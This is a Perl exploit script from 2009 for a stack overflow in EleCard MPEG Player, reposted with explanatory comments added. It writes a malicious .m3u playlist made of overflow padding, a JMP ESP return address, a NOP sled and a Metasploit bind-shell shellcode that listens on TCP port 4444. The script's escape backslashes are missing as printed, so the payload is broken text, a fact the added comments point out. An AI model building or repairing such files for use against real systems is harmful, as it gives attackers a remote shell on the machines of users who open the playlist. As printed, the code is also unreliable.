# Title : EleCard MPEG PLAYER (.m3u file) Local Stack Overflow Exploit
# Published : 2009-01-25
# Author : AlpHaNiX
#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# Thanks
#EAX 00000000
#ECX 41414141
#EDX 775A104D
#EBX 00000000
#ESP 0012C280
#EBP 0012C2A0
#ESI 00000000
#EDI 00000000
#EIP 41414141
# Console colour change intended for the Windows cmd prompt; the return
# value is ignored, exactly as in the original.
system("color 5");
# Exactly one positional argument (the output filename) is expected;
# anything else prints the usage text and stops.
unless (@ARGV == 1) {
    help();
    exit();
}
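# Print the one-line usage text; called when the argument count is wrong.
# The original carried an empty "()" prototype. Prototypes change how a
# call is parsed rather than validating arguments, and the only call site
# uses the &help; form, which bypasses prototypes anyway, so it is dropped.
# The text is reproduced as printed on this page (the trailing "n" is a
# literal letter here, not a newline). Returns nothing.
sub help {
    print "[X] Usage : ./exploit.pl filename n";
    return;
}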
# Output path from the single positional argument. Left as a package
# global on purpose: the write step further down reads $file.
$file = $ARGV[0];

# Banner, printed line by line. The strings are reproduced exactly as they
# appear on this page: the stray "n" characters are literal letters.
my @banner_lines = (
    "n [X]*************************************************n",
    " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *n",
    " [X] Coded By AlpHaNiX *n",
    " [X] From Null Area [NullArea.Net] *n",
    " [X]**************************************************nn",
    "[+] Exploiting.....n",
);
print $_ for @banner_lines;
# First part of the crafted playlist entry: a URL prefix followed by 969
# repeats of the text "x41". As printed on this page the escape backslashes
# are absent, so these are plain ASCII letters and digits, not byte values.
# Precedence reminder: "x" (repetition) binds tighter than "." (concat).
my $buff = 'http://' . ('x41' x 969);

# 6000 repeats of the text "x90" (again literal characters as printed).
my $nop = 'x90' x 6000;

# The author labels this a JMP ESP inside DDRAW.dll, taken from the Windows
# build named in the comment text just below; as printed it is eight
# characters of text.
my $ret = 'xB3x37x8Dx6E';
# Vista Ultimate English
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
# http://metasploit.com
# Payload blob, kept byte-for-byte as printed: 46 concatenated string
# literals. The generator comment above describes it as a 709-byte
# alphanumeric-encoded bind-shell listening on TCP port 4444. As printed on
# this page the "\x" escapes have lost their backslashes, so every literal
# below is plain text rather than byte values; the blob is left untouched
# rather than repaired. Nothing in this file inspects or transforms it;
# it is only concatenated onto the output line further down.
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e".
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58".
"x4ex36x46x52x46x42x4bx38x45x54x4ex33x4bx48x4ex37".
"x45x50x4ax57x41x30x4fx4ex4bx38x4fx44x4ax31x4bx58".
"x4fx55x42x42x41x30x4bx4ex49x54x4bx48x46x53x4bx58".
"x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx53x46x35x46x42x4ax52x45x47x45x4ex4bx48".
"x4fx35x46x52x41x30x4bx4ex48x46x4bx58x4ex30x4bx44".
"x4bx48x4fx35x4ex51x41x50x4bx4ex43x50x4ex52x4bx48".
"x49x38x4ex46x46x42x4ex31x41x36x43x4cx41x53x4bx4d".
"x46x36x4bx58x43x34x42x43x4bx58x42x44x4ex30x4bx48".
"x42x47x4ex31x4dx4ax4bx48x42x54x4ax30x50x45x4ax56".
"x50x38x50x54x50x30x4ex4ex42x45x4fx4fx48x4dx48x46".
"x43x45x48x56x4ax46x43x53x44x33x4ax46x47x57x43x57".
"x44x33x4fx35x46x45x4fx4fx42x4dx4ax56x4bx4cx4dx4e".
"x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx35x49x48x45x4e".
"x48x56x41x58x4dx4ex4ax50x44x30x45x55x4cx46x44x50".
"x4fx4fx42x4dx4ax36x49x4dx49x30x45x4fx4dx4ax47x35".
"x4fx4fx48x4dx43x45x43x55x43x45x43x45x43x45x43x54".
"x43x55x43x34x43x55x4fx4fx42x4dx48x36x4ax56x41x41".
"x4ex55x48x46x43x55x49x58x41x4ex45x49x4ax46x46x4a".
"x4cx41x42x37x47x4cx47x45x4fx4fx48x4dx4cx46x42x41".
"x41x55x45x45x4fx4fx42x4dx4ax56x46x4ax4dx4ax50x32".
"x49x4ex47x35x4fx4fx48x4dx43x35x45x45x4fx4fx42x4d".
"x4ax56x45x4ex49x54x48x58x49x44x47x35x4fx4fx48x4d".
"x42x45x46x35x46x45x45x35x4fx4fx42x4dx43x39x4ax46".
"x47x4ex49x47x48x4cx49x47x47x55x4fx4fx48x4dx45x45".
"x4fx4fx42x4dx48x46x4cx46x46x56x48x56x4ax36x43x56".
"x4dx36x49x48x45x4ex4cx46x42x55x49x35x49x52x4ex4c".
"x49x38x47x4ex4cx36x46x54x49x48x44x4ex41x33x42x4c".
"x43x4fx4cx4ax50x4fx44x54x4dx42x50x4fx44x54x4ex52".
"x43x59x4dx58x4cx37x4ax53x4bx4ax4bx4ax4bx4ax4ax36".
"x44x37x50x4fx43x4bx48x41x4fx4fx45x57x46x44x4fx4f".
"x48x4dx4bx35x47x45x44x55x41x35x41x45x41x45x4cx46".
"x41x50x41x55x41x45x45x35x41x45x4fx4fx42x4dx4ax56".
"x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx46".
"x4fx4fx4fx4fx47x53x4fx4fx42x4dx4bx58x47x55x4ex4f".
"x43x48x46x4cx46x56x4fx4fx48x4dx44x55x4fx4fx42x4d".
"x4ax56x42x4fx4cx48x46x50x4fx55x43x35x4fx4fx48x4d".
"x4fx4fx42x4dx5a";
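# Assemble the single playlist entry: padding, then $ret, the sled and the
# payload, concatenated with no line terminator. From a defender's view
# that is the observable artifact: one .m3u entry many thousands of
# characters long, which no legitimate playlist produces; a parser that
# bounds entry length, or a rule flagging oversized .m3u lines, catches
# this shape.
my $exploit = $buff.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;

# Three-argument open with a lexical handle. The original two-argument
# form, open(blah, ">>$file"), let the filename itself alter the mode
# (a leading "<", ">", "|" or similar is parsed as part of the mode),
# and used a bareword global handle; the mode is now fixed and the
# handle is scoped to this file. $! is added so a failure says why.
open(my $out_fh, '>>', $file) or die "Cannot open $file: $!";
print {$out_fh} $exploit;
# Buffered write errors only surface at close, so close is checked too.
close($out_fh) or die "Cannot close $file: $!";
print "n[+] Please wait while creating $file";
print "n[+] $file has been created";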